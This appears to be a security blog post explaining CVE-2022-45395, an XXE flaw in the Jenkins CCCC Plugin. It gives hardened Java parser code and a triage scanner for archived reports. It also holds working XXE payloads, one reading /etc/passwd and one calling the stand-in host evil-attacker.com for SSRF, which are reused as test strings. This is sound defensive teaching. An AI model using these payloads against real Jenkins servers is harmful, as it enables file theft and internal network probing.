In late 2022, security researchers uncovered a concerning vulnerability — CVE-2022-45395 — in the Jenkins CCCC Plugin, version 0.6 and earlier. Because the plugin's XML parser is not configured to block external entities, an attacker who can supply a crafted XML report can make the Jenkins server read local files or issue requests to other hosts.
In this post, we’ll break down what the bug is, how it works, and how to test it with code examples. If you run Jenkins and use the CCCC Plugin, you need to know about this!
What Is the Jenkins CCCC Plugin?
Jenkins is a popular open-source tool to automate building and deploying code. The CCCC Plugin (C and C++ Code Counter) collects C/C++ code metrics and presents them as part of the Jenkins build report. It parses CCCC XML output files when jobs run.
The Vulnerability: XML External Entity (XXE)
When Jenkins uses the CCCC Plugin to parse code reports in XML files, it uses an XML parser. If the parser isn't told to reject DOCTYPE declarations and external entities (<!ENTITY ...>), attackers can upload crafted XML files that make the server read sensitive files or contact attacker-controlled servers.
CVE-2022-45395 states:
> Jenkins CCCC Plugin 0.6 and earlier does not configure its XML parser to prevent XML External Entity (XXE) attacks.
Source:
- Original Jenkins Security Advisory
- NVD CVE Description
Insecure XML parsing often looks like this in Java:
```java
import java.io.FileInputStream;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Insecure XML parsing: a default DocumentBuilderFactory honours DOCTYPE and
// external entity declarations in the input, so it is vulnerable to XXE
FileInputStream fis = new FileInputStream("report.xml");
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(fis);
```
Safe code should reject DOCTYPE declarations and disable external entities:
```java
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// Primary defence: refuse any DOCTYPE, so the document cannot declare entities at all
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defence in depth for deployments that must accept a DTD: never resolve external entities
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);
DocumentBuilder builder = factory.newDocumentBuilder();
```
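To show the hardened configuration doing its job end to end, here is an added, self-contained example (it is not the CCCC Plugin's code). It builds the locked-down parser, reads the `<total>` value from a constructed benign report shaped like the samples on this page, and then feeds it the file-disclosure document from the exploit section, which the parser rejects before any entity is resolved. The class and method names are the example's own; the `load-external-dtd` and `FEATURE_SECURE_PROCESSING` settings are standard JDK features added here beyond the snippet above.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXException;

// Added example (not the CCCC Plugin's code): a hardened parser for CCCC-style
// XML reports, exercised against a benign report and a DOCTYPE-carrying one.
// Element names (cccc_metrics/summary/total) follow the samples on this page.
public class SafeCcccReportParser {

    // Builds a DocumentBuilder with DTDs and external entities disabled.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Primary defence: refuse any DOCTYPE, so no entities can be declared at all.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth, in case a deployment must permit a DTD.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory.newDocumentBuilder();
    }

    // Parses a report and returns the text of <total>, or null when absent.
    // Throws SAXException when the document is rejected (e.g. it carries a DOCTYPE).
    static String readTotal(String xml) throws ParserConfigurationException, SAXException, IOException {
        Document doc = hardenedBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        NodeList totals = doc.getElementsByTagName("total");
        return totals.getLength() == 0 ? null : totals.item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Constructed benign report in the shape shown on this page.
        String benign = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
                + "<cccc_metrics><summary><total>42</total></summary></cccc_metrics>";
        System.out.println("benign total = " + readTotal(benign));

        // The file-disclosure document from this page: the hardened parser rejects it
        // at the DOCTYPE, so the entity is never declared and /etc/passwd is never opened.
        String hostile = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>"
                + "<!DOCTYPE root [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
                + "<cccc_metrics><summary><total>&xxe;</total></summary></cccc_metrics>";
        try {
            readTotal(hostile);
            System.out.println("UNEXPECTED: hostile report was accepted");
        } catch (SAXException e) {
            System.out.println("rejected hostile report: " + e.getMessage());
        }
    }
}
```

Compile and run it with a plain JDK (`javac SafeCcccReportParser.java && java SafeCcccReportParser`); no Jenkins is needed. The rejection comes from the `disallow-doctype-decl` feature, which is why it is listed first: the remaining settings only matter if that one has to be relaxed.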
Exploit Scenario
Let’s say you are allowed to upload CCCC XML reports via Jenkins web UI (which is common for build automation).
If Jenkins runs the vulnerable plugin and you upload a malicious XML file, you can:
- Read arbitrary files (like /etc/passwd on Linux or C:\windows\win.ini on Windows)
- Make the Jenkins server request a URL of your choosing (SSRF), as in the second example below
Example malicious XML file (reads /etc/passwd):
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<cccc_metrics>
<summary>
<total>&xxe;</total>
</summary>
</cccc_metrics>
```
If the Jenkins plugin processes this XML, it will insert the contents of /etc/passwd into the build results!
Example for SSRF (calls a remote server):
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://evil-attacker.com/xxe.txt">
]>
<cccc_metrics>
<summary>
<total>&xxe;</total>
</summary>
</cccc_metrics>
```
Now Jenkins will try to fetch a file from the attacker's server, which confirms the vulnerability to the attacker and can be used as a "pivot" to reach hosts on private networks that only the Jenkins server can see.
Browse the job report page or download artifacts.
4. You might see sensitive data like /etc/passwd or data from a protected network.
- Upgrade the CCCC Plugin past version 0.6, or patch it if you maintain a fork.
- Apply Jenkins Security Updates regularly. See Jenkins Security Advisory 2022-11-15.
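Upgrading stops new attacks, but reports uploaded before the fix may already be sitting in job workspaces and archived artifacts. The following added example (not Jenkins or plugin code) is a small triage tool for that review: it walks a directory of archived `.xml` reports, reads only the head of each file (a DOCTYPE must precede the root element), and reports every file that carries a DOCTYPE together with the SYSTEM/PUBLIC URIs it names. The class name, the 64 KiB head limit and the two constructed sample files are the example's own choices; the hostile sample reuses the SSRF declaration shown above. It needs Java 11 or newer for `InputStream.readNBytes`.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.stream.Collectors;
import java.util.stream.Stream;

// Added example, not Jenkins or CCCC Plugin code: triage archived report XML for
// DOCTYPE declarations and the external resources (SYSTEM/PUBLIC identifiers) they name.
public class XxeArtifactTriage {

    // A DOCTYPE must appear before the root element, so only the head of each file is read.
    static final int HEAD_BYTES = 64 * 1024;

    // SYSTEM "uri"  or  PUBLIC "public-id" "uri"; the URI is capture group 1.
    private static final Pattern EXTERNAL_ID = Pattern.compile(
            "\\b(?:SYSTEM|PUBLIC)\\s+(?:\"[^\"]*\"\\s+)?[\"']([^\"']*)[\"']",
            Pattern.CASE_INSENSITIVE);

    // Returns the external URIs named inside the DOCTYPE (including its internal subset),
    // or an empty list when the document has no DOCTYPE at all.
    static List<String> externalReferences(String head) {
        List<String> refs = new ArrayList<>();
        int start = head.indexOf("<!DOCTYPE");
        if (start < 0) return refs;
        int bracket = head.indexOf('[', start);
        int gt = head.indexOf('>', start);
        int end;
        if (bracket >= 0 && (gt < 0 || bracket < gt)) {
            int close = head.indexOf("]>", bracket);   // internal subset present
            end = close < 0 ? head.length() : close + 2;
        } else {
            end = gt < 0 ? head.length() : gt + 1;      // bare <!DOCTYPE root> or external DTD only
        }
        Matcher m = EXTERNAL_ID.matcher(head.substring(start, end));
        while (m.find()) refs.add(m.group(1));
        return refs;
    }

    // One finding per file that carries a DOCTYPE; files without one are not reported.
    static List<String> scan(Path root) throws IOException {
        List<Path> xmlFiles;
        try (Stream<Path> s = Files.walk(root)) {
            xmlFiles = s.filter(Files::isRegularFile)
                        .filter(p -> p.toString().endsWith(".xml"))
                        .collect(Collectors.toList());
        }
        List<String> findings = new ArrayList<>();
        for (Path p : xmlFiles) {
            String head;
            try (InputStream in = Files.newInputStream(p)) {
                // ISO-8859-1 maps every byte to one char, so ASCII markup survives whatever
                // encoding the file declares. (A UTF-16 file would need transcoding first.)
                head = new String(in.readNBytes(HEAD_BYTES), StandardCharsets.ISO_8859_1);
            }
            if (!head.contains("<!DOCTYPE")) continue;
            List<String> refs = externalReferences(head);
            findings.add(p.getFileName() + ": DOCTYPE present"
                    + (refs.isEmpty() ? "" : ", external references " + refs));
        }
        return findings;
    }

    public static void main(String[] args) throws IOException {
        // Constructed stand-ins for archived job reports: one clean, one carrying the
        // SSRF-style declaration shown on this page.
        Path dir = Files.createTempDirectory("cccc-triage");
        Files.write(dir.resolve("clean.xml"), ("<?xml version=\"1.0\"?>"
                + "<cccc_metrics><summary><total>7</total></summary></cccc_metrics>")
                .getBytes(StandardCharsets.UTF_8));
        Files.write(dir.resolve("suspicious.xml"), ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                + "<!DOCTYPE root [\n<!ENTITY xxe SYSTEM \"http://evil-attacker.com/xxe.txt\">\n]>\n"
                + "<cccc_metrics><summary><total>&xxe;</total></summary></cccc_metrics>")
                .getBytes(StandardCharsets.UTF_8));
        for (String finding : scan(dir)) System.out.println(finding);
    }
}
```

Point `scan` at a Jenkins job's archived artifact directory to review reports that were accepted while the plugin was vulnerable. The check is deliberately text-based so it never parses the suspicious file itself; it is a triage aid for finding what was uploaded, not a substitute for the parser hardening above, and a report whose DOCTYPE names a `file:` or `http:` URI is the one to investigate first.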
References & Further Reading
- CVE-2022-45395 on NVD
- Jenkins CCCC Plugin
- OWASP XXE Guide
- Jenkins Security Advisories
Closing Thoughts
CVE-2022-45395 is a classic example of why secure parsing is crucial when working with XML. If you use Jenkins and especially accept user input as XML files, this is a *must fix* — attacker-supplied XML can compromise your whole server.
Stay safe and stay updated! If you need more help with Jenkins or secure CI/CD, check the links above and keep your dependencies fresh.
Timeline
Published on: 11/15/2022 20:15:00 UTC
Last modified on: 11/20/2022 03:02:00 UTC